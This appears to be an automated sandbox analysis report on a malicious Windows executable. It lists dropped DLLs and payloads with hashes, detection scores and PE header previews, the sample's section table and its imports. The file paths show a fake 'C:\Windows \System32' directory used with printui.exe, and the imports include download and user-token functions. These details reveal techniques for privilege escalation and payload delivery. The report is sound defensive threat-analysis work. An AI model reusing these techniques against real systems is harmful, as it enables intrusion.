                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........y..........................................................................Rich....................PE..d...0.sA.........."............................@.............................@.......E....`.......... .......................................'.......P.......@...............0..$...P$..T............................ ..............(!...............................text............................... ..`.rdata....... ......................@..@.data...x....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..$....0......................@..B........................................................................................................................................................................................................................................................................
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):64
                        Entropy (8bit):0.34726597513537405
                        Encrypted:false
                        SSDEEP:3:Nlll:Nll
                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                        Malicious:false
                        Preview:@...e...........................................................
                        Process:C:\Windows \System32\printui.exe
                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                        Category:dropped
                        Size (bytes):477696
                        Entropy (8bit):6.57837388441486
                        Encrypted:false
                        SSDEEP:6144:gxB2z8RCqsezXL7YiebX6u+bjq7TC78Vd29ZXph0lhSMXlBXBWnZLcN5hwcf:UIqt7M2bjqnC7m2Xph0lhSMXliZLcF
                        MD5:74CF33F8C2FCB56F749AAF411B9AE302
                        SHA1:934FC91EE0AB5D8879E26BD9A5F002EDCB474602
                        SHA-256:941CB9145ACA265C4E209EF54C14E746696F198C48CE216A0F3FCDAB23DB877E
                        SHA-512:37E36C2A9AAF2B1B6E993BCCDA77B34EFB9AAC8C2260B310BB071592A475298F7FAA2F4DAC38D3402517483F811F57F57B4B9335C41D4140968608248003C012
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 18%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<...x..x..x...E......E..j...E..~..h@..r..h@..i..h@.. ..m@..z...E..}..x.....0A..z..0AP.y..0A..y..Richx..........................PE..d...^B.f.........."....).......................@..........................................`.....................................................P............@...6...................z..8............................x..@...............p............................text...0........................... ..`.rdata..f5.......6..................@..@.data...40..........................@....pdata...6...@...8..................@..@.fptable.............:..............@....rsrc................<..............@..@.reloc...............>..............@..B........................................................................................................................................................................................
                        Process:C:\Windows \System32\printui.exe
                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                        Category:dropped
                        Size (bytes):4684800
                        Entropy (8bit):6.761708409908653
                        Encrypted:false
                        SSDEEP:98304:E1+WtBcda7nzo7Vd8qQQPQ1CPwDvt3uFGCC:gXtBcda7nzo7Vd8qQQY1CPwDvt3uFGCC
                        MD5:158F0E7C4529E3867E07545C6D1174A9
                        SHA1:9FF0CCCB271F0215AD24427B7254832549565154
                        SHA-256:DCC1FA1A341597DDB1476E3B5B3952456F07870A26FC30B0C6E6312764BAA1FC
                        SHA-512:51E79D8D0AB183046F87AA659973B45147BB1E1AE8883F688C615CCB18BF9FCCB8779DD872B01748BACD56E141BC096C2BB4CCF32EBD7A49ADC76363355E40FE
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............vI..vI..vI..I..vI;DwH..vI;DsH..vI;DrH..vI;DuH..vI..wI*.vI..wH..vI..vI..vI.GrHl.vI.GvH..vI.G.I..vI.GtH..vIRich..vI........PE..d...d.Lf.........." ...'..4..........4.......................................G...........`...........................................A. ... @D.@....0G.......D.LH...........@G.L.....?.T.............................?.@.............4..............................text...8.4.......4................. ..`.rdata..*.....4.......4.............@..@.data....t...`D..J...JD.............@....pdata..LH....D..J....D.............@..@.rsrc........0G.......F.............@..@.reloc..L....@G.......F.............@..B................................................................................................................................................................................................................................................
                        Process:C:\Windows \System32\printui.exe
                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                        Category:dropped
                        Size (bytes):561152
                        Entropy (8bit):6.383490918799092
                        Encrypted:false
                        SSDEEP:12288:0u3rEnX6Gtd3+XZRnRNvNu86p07GZiDnwXA3qGueVW08G:d7EnX/L3+p7NvNu8OqnwXA3qGueVWG
                        MD5:93F8F5133ED40262B9FD437915718B82
                        SHA1:A18E34F2E1ECADA88249D5B6A87F137A2A1E5041
                        SHA-256:78993F8E7AC2D139A8B7198F229D8EF1BA2000D7EB1B07FB7AA4FCCCF7786151
                        SHA-512:E1F15B6CEE766D02823938B38BB580C7EFF94E0F4CD907AC4676A65BBC4A9632B5DB0CA54D7B8E6E14042510720E063C00C538DEA3DCBD56C94C65EEADCFCB26
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1i[.u.5Pu.5Pu.5P|p.Pg.5P..4Qw.5P...P}.5P..6Qq.5P..1Q}.5P..0Qx.5Pe.4Qw.5Pu.4P..5P>p4Q~.5Pe.1Q..5Pe.5Qt.5Pe..Pt.5Pu..Pt.5Pe.7Qt.5PRichu.5P........PE..d....,Of.........." ...(.Z...<.......]....................................................`.........................................@.......H...T............`..(S..............X.......T..............................@............p...............................text...8X.......Z.................. ..`.rdata......p.......^..............@..@.data...(0... ...(..................@....pdata..(S...`...T...*..............@..@.rsrc................~..............@..@.reloc..X...........................@..B................................................................................................................................................................................................................................
                        Process:C:\Windows \System32\printui.exe
                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                        Category:dropped
                        Size (bytes):1851113
                        Entropy (8bit):6.295735352298234
                        Encrypted:false
                        SSDEEP:24576:SAlxpPnBAUZLY9OVbbTiZGavkg3NyeuQ6l9fH+f2ykqZrkgecviRd7mQFz:DPnBAUZLY9OEZGaXBuQQ9e2YYUQFz
                        MD5:158BC77453D382CF6679CE35DF740CC5
                        SHA1:9A3C123CE4B6F6592ED50D6614387D059BFB842F
                        SHA-256:CF131738F4B5FE3F42E9108E24595FC3E6573347D78E4E69EC42106C1EEBE42C
                        SHA-512:6EB1455537CB4E62E9432032372FAE9CE824A48346E00BAF38EF2F840E0ED3F55ACAEE2656DA656DB00AE0BDEF808F8DA291DD10D7453815152EDA0CCFC73147
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...8.Jd....q.....& ..."............P..........f............................................. .................................................D....@..........d............P..................................(.......................p............................text..............................`.P`.data...............................@.P..rdata..............................@.`@.pdata..d...........................@.0@.xdata..............................@.0@.bss..................................`..edata..............................@.0@.idata..D...........................@.0..CRT....X.... ......................@.@..tls.........0......................@.@..rsrc........@......................@.0..reloc.......P......................@.0B/4...... ....`......................@..B/19.....m....p... ..................@..B/31......2.......4..................@..B/45.....
                        Process:C:\Windows \System32\printui.exe
                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                        Category:dropped
                        Size (bytes):475769
                        Entropy (8bit):5.442192544327632
                        Encrypted:false
                        SSDEEP:12288:YoSRYqB/kDraXbQTNRC6RsclS8DzT6Bam:+YY/kDraLQTNRCPWDzT6Bam
                        MD5:E79E7C9D547DDBEE5C8C1796BD092326
                        SHA1:8E50B296F4630F6173FC77D07EEA36433E62178A
                        SHA-256:1125AC8DC0C4F5C3ED4712E0D8AD29474099FCB55BB0E563A352CE9D03EF1D78
                        SHA-512:DBA65731B7ADA0AC90B4122C7B633CD8D9A54B92B2241170C6F09828554A0BC1B0F3EDF6289B6141D3441AB11AF90D6F8210A73F01964276D050E57FB94248E2
                        Malicious:false
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......[.H........& .....D....................(h....................................0......... ......................................................@..8....................P..p........................... 0..(....................................................text...8C.......D..................`.P`.data........`.......J..............@.`..rdata..0M...p...N...L..............@.`@.pdata..............................@.0@.xdata..d...........................@.0@.bss....P.............................`..edata..............................@.0@.idata..............................@.0..CRT....X.... ......................@.@..tls....h....0......................@.`..rsrc...8....@......................@.0..reloc..p....P......................@.0B/4...........`......................@.PB/19..........p......................@..B/31.....1:.......<..................@..B/45.....
                        Process:C:\Windows \System32\printui.exe
                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                        Category:dropped
                        Size (bytes):327168
                        Entropy (8bit):6.055910692008984
                        Encrypted:false
                        SSDEEP:6144:veJ/i9L1mle2NwGTQ46ZEEKN4zP2/SHzI4l/4OMx7apSPIYuh0L/iXmJ:gmV2NwQQ3G4zP22rOIy
                        MD5:EF060E5C414B7BE5875437FF2FB8EC54
                        SHA1:6DCF04DFF9B25BE556EC97660F95ACF708C0C870
                        SHA-256:E6ACED8D30471F35B37ABBF172CE357B6A8F18AF5FEB342B6CFFC01D3378F2B4
                        SHA-512:67BFF321BA901A0B0DC0F6C4A723D7DF35418F593E16E6193673CCE5190D76355409F676C1EA5D0CB46493F5735209089A3A52D3D716EB8187BF6E846792E2E8
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.........t3R..`R..`R..`[..`D..`To.aP..`To.`T..`To.a_..`To.aZ..`To.aV..`...a^..`n..aU..`R..`K..`=o.ag..`=o.aS..`=o.`S..`R.`S..`=o.aS..`RichR..`........................PE..d.....:f.........." ...&.l...........e.......................................@............`...@...................................................... ..........,"...........0.......k..T...........................pj..@...............p............................text...xj.......l.................. ..`.rdata..vT.......V...p..............@..@.data...............................@....pdata..,".......$..................@..@.rsrc........ ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................
                        Process:C:\Windows \System32\printui.exe
                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                        Category:dropped
                        Size (bytes):818176
                        Entropy (8bit):6.269258421632734
                        Encrypted:false
                        SSDEEP:12288:NGbc08emtUas2F158w1T4qLgl85MNRlqnZ5ydEVB3i:NGoL9W0lJ5cR9dEVB3
                        MD5:69D0FEE0CC47C3B255C317F08CE8D274
                        SHA1:782BC8F64B47A9DCEDC95895154DCA60346F5DD7
                        SHA-256:BA979C2DBFB35D205D9D28D97D177F33D501D954C7187330F6893BB7D0858713
                        SHA-512:4955252C7220810ED2EACA002E57D25FBC17862F4878983C4351C917CF7873EB84AE00E5651583004F15A08789BE64BDB34FF20CB0E172C9C1376706DEB4AA1A
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5...q..q..q..x.'.c...O..s...O..|...O..y...O..u..:...u...L..r..q..*...L......L..p...LK.p...L..p..Richq..................PE..d...d.Lf.........." ...'..................................................................`..........................................0...K...{..................Hr..............\.......T...............................@............................................text...X........................... ..`.rdata..L...........................@..@.data...8=.......8..................@....pdata..Hr.......t..................@..@.rsrc................`..............@..@.reloc..\............d..............@..B........................................................................................................................................................................................................................................
                        Process:C:\Windows \System32\printui.exe
                        File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                        Category:dropped
                        Size (bytes):52736
                        Entropy (8bit):5.840253326728635
                        Encrypted:false
                        SSDEEP:768:fE20UsQSmxsJ/jPxsiFFnoCImovqcyz88rtYNChvThLaim3Yu/g/D8:cis0sP5FBQ7vU9BYshtaim3Yuo78
                        MD5:9DC829C2C8962347BC9ADF891C51AC05
                        SHA1:BF9251A7165BB2981E613AC5D9051F19EDB68463
                        SHA-256:FFE2D56375BB4E8BDEE9037DF6BEFC5016DDD8871D0D85027314DD5792F8FDC9
                        SHA-512:FD7E6F50A21CB59075DFA08C5E6275FD20723B01A23C3E24FB369F2D95A379B5AC6AE9F509AA42861D9C5114BE47CCE9FF886F0A03758BFDC3A2A9C4D75FAB56
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d..................".....|.....................d.............................P................ ......................................................0..P....................@..h........................... ..(....................................................text...({.......|..................`.P`.data...............................@.P..rdata..............................@.P@.pdata..............................@.0@.xdata..............................@.0@.bss..................................p..edata..............................@.0@.idata..............................@.0..CRT....`...........................@.@..tls....h.... ......................@.`..rsrc...P....0......................@.0..reloc..h....@......................@.0B................................................................................................................................
                        Process:C:\Windows \System32\printui.exe
                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                        Category:dropped
                        Size (bytes):1786880
                        Entropy (8bit):6.056894707447503
                        Encrypted:false
                        SSDEEP:24576:JUV0C8E3W4JoceLErS6P0qoc6uoPrT5PgVBHmaw+zrGOzli7Gi0m9ZRXyYk:i8/B90ozghlGJ7js
                        MD5:C3130CFB00549A5A92DA60E7F79F5FC9
                        SHA1:56C2E8FB1AF609525B0F732BB67B806BDDAB3752
                        SHA-256:EEE42EABC546E5AA760F8DF7105FCF505ABFFCB9EC4BF54398436303E407A3F8
                        SHA-512:29BAB5B441484BDFAC9EC21CD4F0F7454AF05BFD7D77F7D4662AEAEAA0D3E25439D52AA341958E7896701546B4A607D3C7A32715386C78B746DFAE8529A70748
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'.S.c.=.c.=.c.=.j...P.=.c.<...=..}.b.=..}.S.=..}.'.=..}...=..}.u.=..}.b.=..}.b.=.Richc.=.........PE..d...~.!U.........." .................................................................g....`A........................................p........C..................x................... ...............................`...................H............................text............................... ..`.rdata...x.......z..................@..@.data...(Z...`...$...J..............@....pdata..x............n..............@..@.rsrc................2..............@..@.reloc...............8..............@..B........................................................................................................................................................................................................................................................................
                        Process:C:\Users\user\Desktop\pyld64.exe
                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                        Category:dropped
                        Size (bytes):14693888
                        Entropy (8bit):6.554170789313033
                        Encrypted:false
                        SSDEEP:393216:3PsdXtBcda7nzo7Vd7Qv1CPwDvt3uFRCvfxlXnwXAaGueVW3XSdEVB3:3ITkS6
                        MD5:11DDC0A34BAC7AB099D2EE8D9817BF58
                        SHA1:C9BD99F91118FCA4E1BFDEBC36CDED5B09BE39D0
                        SHA-256:0C396F737C1DECD395926CB52CC9F3D2AD1A3EEE5290DB62197CF617F2F0E554
                        SHA-512:62A0FF1412B3E28053FE2888D088C63B21BC07BD922C6286CAAF94FABAAC9FB5CABF91668CBEEE88E71B5B48F27613CBCCA63272A2AB604FCED69DA776567E49
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 58%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........B...,...,...,.L).F.,.L(...,.L/...,..I/...,..I(...,..I)..,.L-...,...-.}.,.H%...,.H....,.H....,.Rich..,.........................PE..d....C.f.........."....).(...".................@..........................................`.....................................................P....p.......0..<-..................`...8........................... ...@............@..`............................text....&.......(.................. ..`.rdata..>....@.......,..............@..@.data...h,..........................@....pdata..<-...0......................@..@.fptable.....`.......(..............@....rsrc........p.......*..............@..@.reloc...............,..............@..B................................................................................................................................................................................................
                        Process:C:\Windows \System32\printui.exe
                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                        Category:dropped
                        Size (bytes):131920
                        Entropy (8bit):6.0574531251583865
                        Encrypted:false
                        SSDEEP:1536:QB6NlnzaWMj6FBknM+eHLEQE9gHAWdwfP5sd4Sohg7vMHvqZecb399R0BqZEBFP:QBYl5MOcM1HAb1wM0ecb39/0BqZEjP
                        MD5:F57FB935A9A76E151229F547C2204BBA
                        SHA1:4021B804469816C3136B40C4CEB44C8D60ED15F5
                        SHA-256:A77277AF540D411AE33D371CC6F54D7B0A1937E0C14DB7666D32C22FC5DCA9C0
                        SHA-512:CD9FC3FC460EBA6A1B9F984B794940D28705ECB738DF8595C2341ABE4347141DB14A9FF637C9F902E8742F5C48BBB61DA7D5E231CC5B2BAD2E8746C5A3E3E6ED
                        Malicious:false
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........].AB<..B<..B<....h.@<....L.A<..B<..l<..yb..I<..yb..V<..yb..Z<..yb..C<..yb\.C<..yb..C<..RichB<..................PE..d....LZW.........." .....j...\......pg....................................... ...........`A...........................................4.......<.......................P?......t...p...T...........................................................................text....h.......j.................. ..`.rdata..F5.......6...n..............@..@.data...............................@....pdata..............................@..@_RDATA..............................@..@.rsrc...............................@..@.reloc..t...........................@..B........................................................................................................................................................................................................................
                        Process:C:\Windows \System32\printui.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):384
                        Entropy (8bit):7.449702240473978
                        Encrypted:false
                        SSDEEP:6:a1yzGK019rYhVXAsui2cxoOFO79eNtId8qXjo+4M8Oa14BwBRA20GG8sArNS0rwM:qm4BYhVXAst2cx7OxeM5Uww4BN/T8h0U
                        MD5:E4DBF14B398816BA31D6CF9A3467D7FE
                        SHA1:FCFE763F220BEC9100333F544362E8B32F17E6FF
                        SHA-256:6B7E165E5D28731F30D76CBD5397701E4C49E75D037D88EF1DE2467BE64296E1
                        SHA-512:170B9B0821931DF6C6060BE9F954F31301ED1C14A34093FD1F7B7DC7AE2D6CA22978D1F102B4FB1F1232CD2F5DCF90F6EA5E7CC221FF854B312615EFD6907604
                        Malicious:false
                        Preview:.....S.N....A....N...-.p...Hbx.Q...Q.=L.4#V.s...N..)...+c...._.;.j;....+.q....4.S..c.\.X.. .$.ba.t.*..x.-3..M..a..+.A...#.........Pq9..i..ET.B..A..PP...p-...Y,.9"./oc.|\.H&..<{..5..c^..K..#...../..'a.S....[.....hZ.........3....{.].\;a}.n...t...'.=_!.A.....?.=Kq....g.....S....F..N._...>..MZ.,3.R.R..Hv...Ie.x.c.G7'..4.{._...".....O.Ab+.iT.....1..l.$..*.7..PjP.. ....
                        Process:C:\Windows \System32\printui.exe
                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                        Category:dropped
                        Size (bytes):2256384
                        Entropy (8bit):6.5528122196655545
                        Encrypted:false
                        SSDEEP:24576:IIVkvsArhlpgxVnHkVnya+h0lhSMXlMDXg87/iXAah0lhSMXlDT/Z6Po7al9Nbtw:IMkkA1EHGnLag8TL3J6P7FGcjq
                        MD5:E4BD51C06CFF7A34FCCC4576AF852AFE
                        SHA1:D503AAFF2986C8F714D0FA457125BE566B6A9F95
                        SHA-256:FFAC21DD5AE0E22A1DC423361ECBFE5D73F2F11DB5A1F6906B03B2A0A2B6612C
                        SHA-512:5B2C69254F2EC25B2467983AE5C965F7860C4BDF8470E97594E6A0353CCC8E682B81815132FD38CE8B7F8F23FA013DA10C06C003C4B983A054651CC93A42324E
                        Malicious:true
                        Antivirus:
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        • Antivirus: ReversingLabs, Detection: 42%
                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......}.%.9dK.9dK.9dK.I.N..dK.I.H.0dK.).O.6dK.,.J.;dK.I.O.!dK.).H.2dK.).N..dK.V.J.;dK.I.J.4dK.9dJ.3eK.q.B.(dK.q.K.8dK.q.8dK.q.I.8dK.Rich9dK.........................PE..d...!?.f.........." ...)............4........................................."...........`..........................................}!.P....}!......."...... ".<.............".l...0...8.......................(.......@............0...............................text...d........................... ..`.rdata..f`...0...b... ..............@..@.data...4}....!..J....!.............@....pdata..<.... ".......!.............@..@.fptable......"......R".............@....rsrc........."......T".............@..@.reloc..l....."......V".............@..B........................................................................................................................................................................
                        Process:C:\Windows \System32\printui.exe
                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                        Category:dropped
                        Size (bytes):90624
                        Entropy (8bit):6.511410074418791
                        Encrypted:false
                        SSDEEP:1536:EarCl5V5lEwda1RnSbFfbpYwayRyivl9bEKIOcIOZgyZ6rM3SIryPoIKr:EKcV5lEwUbShbpbaCpvsYSZgU6A3SIrf
                        MD5:BB78414FB31B53EF8FAD8AFBEDBB834C
                        SHA1:2CA62ED9A628E17887C0C9E5C07A2CC44B926EF8
                        SHA-256:AE8951AD96124A39B63610D7A5A53B446FC7F19151AC1D8E5AC15E8C88227EBF
                        SHA-512:9244CDF4EB86AE4071A74D584D170AC3D8F414F13EF3E9E8988C49B3488DC6FA1BB4DBB771635F145AE06484421C1101D120F63D34F3C479CD5F1FF9AAA646AF
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................[...a!....a!5...a!....a!....a!..............&....&....&7..._...&....Rich............................PE..d....,Of.........." ...(..................................................................`..........................................O......`W..........P....p..X...............l....>..T...........................`=..@...............x............................text............................... ..`.rdata...m.......n..................@..@.data........`.......L..............@....pdata..X....p.......N..............@..@.rsrc...P............Z..............@..@.reloc..l............`..............@..B........................................................................................................................................................................................................................
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        File type:PE32+ executable (GUI) x86-64, for MS Windows
                        Entropy (8bit):6.569534497252625
                        TrID:
                        • Win64 Executable GUI (202006/5) 92.65%
                        • Win64 Executable (generic) (12005/4) 5.51%
                        • Generic Win/DOS Executable (2004/3) 0.92%
                        • DOS Executable Generic (2002/1) 0.92%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:Ld0f3NDosJ.exe
                        File size:440'832 bytes
                        MD5:00948444f3e248047722667419d54205
                        SHA1:ca291799966f2a1d8ec8cdab92daa6883bddac9e
                        SHA256:c97c029e6368bf6502e9c9c9ee0fc079c61da9e79c3798e8a246d19446b5afa8
                        SHA512:2c46a486fa26ed2c7da61309fd89acdee68c68d6b82f3f55f63c27d66737eba34a9ad4b7d62c27e8d4e40634ca9679ad13e1cb612ddfc3627c1b66657d7b4e3c
                        SSDEEP:6144:BQPNCRpJ2L+WVeE+KLKeR21lgp+A1ph0lhSMXlBXBWnd0oEsW5xW:TXaUgLTM1i+A1ph0lhSMXlid0oRoxW
                        TLSH:57949D1673E884F8E1A6C27888960A06E77378150751EBDF03ACD6762F636D15E3EF11
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............n\..n\..n\.xk]..n\.xj]..n\.xm]..n\.}m]..n\.}j]..n\.}k]..n\.xo]..n\..o\7.n\.|g]..n\.|.\..n\.|l]..n\Rich..n\...............
                        Icon Hash:00928e8e8686b000
                        Entrypoint:0x14001adb8
                        Entrypoint Section:.text
                        Digitally signed:false
                        Imagebase:0x140000000
                        Subsystem:windows gui
                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                        Time Stamp:0x66C17707 [Sun Aug 18 04:22:31 2024 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:6
                        OS Version Minor:0
                        File Version Major:6
                        File Version Minor:0
                        Subsystem Version Major:6
                        Subsystem Version Minor:0
                        Import Hash:033434673f6efe9e2891aa40ad6d0718
                        Instruction
                        Name | Virtual Address | Virtual Size | Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0x66e0c | 0x64 | .rdata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x6f000 | 0x1e0 | .rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x6b000 | 0x2ea4 | .pdata
                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x70000 | 0x9d8 | .reloc
                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x60f10 | 0x38 | .rdata
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x60dd0 | 0x140 | .rdata
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_IAT | 0x36000 | 0x390 | .rdata
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                        Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                        .text | 0x1000 | 0x34384 | 0x34400 | 44e26ba7e96be6edb16cae0cabdf4ba5 | False | 0.517835115131579 | data | 6.457466429077762 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        .rdata | 0x36000 | 0x31a5e | 0x31c00 | c5127ad2fae8ee2d35643d7b83dffa15 | False | 0.4164867305276382 | data | 6.268329302694746 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .data | 0x68000 | 0x2da8 | 0x1800 | d3983c22e13b30ca36bcc5ce8b390911 | False | 0.18603515625 | DOS executable (block device driver) | 3.2050803665603405 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .pdata | 0x6b000 | 0x2ea4 | 0x3000 | 8bc35622f15dac12037386bcfa847059 | False | 0.4722493489583333 | data | 5.465467733948664 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .fptable | 0x6e000 | 0x100 | 0x200 | bf619eac0cdf3f68d496ea9344137e8b | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .rsrc | 0x6f000 | 0x1e0 | 0x200 | 9eb749b94f12b10c4656fbdd74aa9142 | False | 0.53125 | data | 4.7176788329467545 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .reloc | 0x70000 | 0x9d8 | 0xa00 | 0c5bf3474ebb54c7ebd5d121fe855905 | False | 0.526171875 | data | 5.382944096935259 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                        Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                        RT_MANIFEST | 0x6f060 | 0x17d | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5931758530183727
                        DLL | Import
                        WTSAPI32.dll | WTSQueryUserToken
                        urlmon.dll | URLDownloadToFileW
                        KERNEL32.dll | GetSystemDirectoryW, CloseHandle, WTSGetActiveConsoleSessionId, WaitForSingleObject, GetModuleFileNameW, MultiByteToWideChar, GetCurrentDirectoryW, GetProcessHeap, HeapSize, WriteConsoleW, SetEndOfFile, CreateProcessW, CreateDirectoryW, CreateFileW, FindClose, FindFirstFileW, FindFirstFileExW, FindNextFileW, GetFileAttributesExW, GetFileInformationByHandle, SetFileInformationByHandle, AreFileApisANSI, GetLastError, DeviceIoControl, GetModuleHandleW, GetProcAddress, CopyFileW, GetFileInformationByHandleEx, CreateSymbolicLinkW, WideCharToMultiByte, LocalFree, FormatMessageA, GetLocaleInfoEx, QueryPerformanceCounter, QueryPerformanceFrequency, Sleep, GetCurrentThreadId, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, EncodePointer, DecodePointer, LCMapStringEx, GetSystemTimeAsFileTime, RtlUnwind, GetStringTypeW, GetCPInfo, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, GetCurrentProcessId, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, RtlUnwindEx, RtlPcToFileHeader, RaiseException, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, GetFileSizeEx, SetFilePointerEx, GetFileType, HeapAlloc, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, HeapFree, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, VirtualProtect, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, ReadFile, ReadConsoleW, HeapReAlloc, IsValidCodePage, 